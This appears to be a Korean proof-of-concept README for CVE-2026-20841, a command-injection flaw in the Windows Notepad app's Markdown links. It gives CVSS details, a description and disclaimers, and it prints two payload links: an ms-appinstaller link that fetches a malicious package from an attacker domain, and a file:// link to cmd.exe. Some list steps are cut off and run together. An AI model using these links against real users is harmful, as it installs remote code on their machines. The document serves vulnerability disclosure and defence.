
개념 증명(PoC)으로, 조작된 Markdown 링크를 통해 Windows 메모장에서 명령 주입을 시연하여 원격 코드 실행을 가능하게 합니다. 공격 벡터, CVSS 지표, 그리고 수정 지침을 포함합니다.
| 필드 | 세부 정보 |
|---|
| CVE ID | CVE-2026-20841 |
| 제목 | Windows 메모장 앱 원격 코드 실행 취약점 |
| 영향 | 원격 코드 실행 |
| 최대 심각도 | 중요(Important) |
| CVSS v3.1 기본 / 임시 점수 | 8.8 / 7.7 |
| CVSS 벡터 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C |
| CWE | CWE-77: 명령에 사용되는 특수 요소의 부적절한 중화 ('명령 주입') |
| 영향받는 제품 | Windows 메모장 앱 (Microsoft Store 버전, 11.2510 이전 빌드) |
| CNA 지정 기관 | Microsoft |
| 게시일 | 2026년 2월 10일 |
| 공개 여부 | 아니요 |
| 악용 여부 | 아니요 |
| 악용 가능성 평가 | 악용 가능성 낮음 |
Windows 메모장 앱에서 명령에 사용되는 특수 요소의 부적절한 중화('명령 주입')로 인해 인증되지 않은 공격자가 네트워크를 통해 코드를 실행할 수 있습니다.
최신 Windows 메모장 앱(Microsoft Store를 통해 배포)은 클릭 가능한 하이퍼링크를 포함하는 Markdown 렌더링 기능을 도입했습니다. 이 취약점은 메모장이 Markdown 링크 내의 URI 스킴을 처리하기 전에 제대로 검증하고 삭제하지 못하기 때문에 발생합니다. 공격자는 특수하게 구성된 링크가 포함된 악성 .md 파일을 제작하여, 사용자가 이를 클릭하면 검증되지 않은 프로토콜 핸들러가 원격 콘텐츠를 로드하고 실행하도록 유도할 수 있습니다.
| 지표 | 값 |
|---|---|
| 공격 벡터 | 네트워크 |
| 공격 복잡성 | 낮음 |
| 필요한 권한 | 없음 |
| 사용자 상호작용 | 필요 |
| 범위 | 변경되지 않음 |
| 기밀성 영향 | 높음 |
| 무결성 영향 | 높음 |
| 가용성 영향 | 높음 |
| 지표 | 값 |
|---|---|
| 악용 코드 성숙도 | 입증되지 않음 |
| 수정 수준 | 공식 수정 |
| 보고 신뢰도 | 확인됨 |
공격자는 이 취약점을 어떻게 악용할 수 있나요?
공격자는 사용자가 메모장에서 연 Markdown 파일 내의 악성 링크를 클릭하도록 속여, 애플리케이션이 검증되지 않은 프로토콜을 실행하여 원격 파일을 로드하고 실행하게 할 수 있습니다.
원격 코드 실행의 대상 컨텍스트는 무엇인가요?
CVSS 지표에 따르면 공격 벡터는 네트워크(AV:N)이고 사용자 상호작용이 필요합니다(UI:R). 악성 코드는 Markdown 파일을 연 사용자의 보안 컨텍스트에서 실행되므로, 공격자는 해당 사용자와 동일한 권한을 얻게 됩니다.
.md) 파일을 제작합니다.ms-appinstaller://) 또는 로컬 실행 파일을 직접 실행할 수 있는 file:// URI가 트리거됩니다.면책 조항: 이 개념 증명은 교육 및 공인된 보안 연구 목적으로만 제공됩니다. 소유하지 않았거나 명시적인 서면 테스트 허가를 받지 않은 시스템에 이를 사용하지 마십시오. 컴퓨터 시스템에 대한 무단 접근은 불법이며 법적 처벌을 받을 수 있습니다.
PoC는 제작된 Markdown 링크를 통한 두 가지 공격 벡터를 보여줍니다:
벡터 1 - 프로토콜 핸들러 남용을 통한 원격 페이로드 설치:
[Click to view document](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)
벡터 2 - 파일 URI를 통한 로컬 실행 파일 호출:
[Click here](file://C:/windows/system32/cmd.exe)

.md 파일을 메모장에서 열지 마세요.이 저장소에 제공된 정보는 교육 및 공인된 보안 연구 목적으로만 제공됩니다. 이 개념 증명은 방어자가 취약점을 이해하고 완화하는 데 도움을 주기 위해 공유됩니다. 저자는 여기에 제공된 정보나 도구의 오용에 대해 책임을 지지 않습니다. 모든 시스템에서 취약점을 테스트하기 전에 항상 적절한 서면 승인을 받으십시오. 컴퓨터 시스템에 대한 무단 접근은 대부분의 관할권에서 범죄 행위입니다. 책임감 있고 윤리적으로 사용하십시오.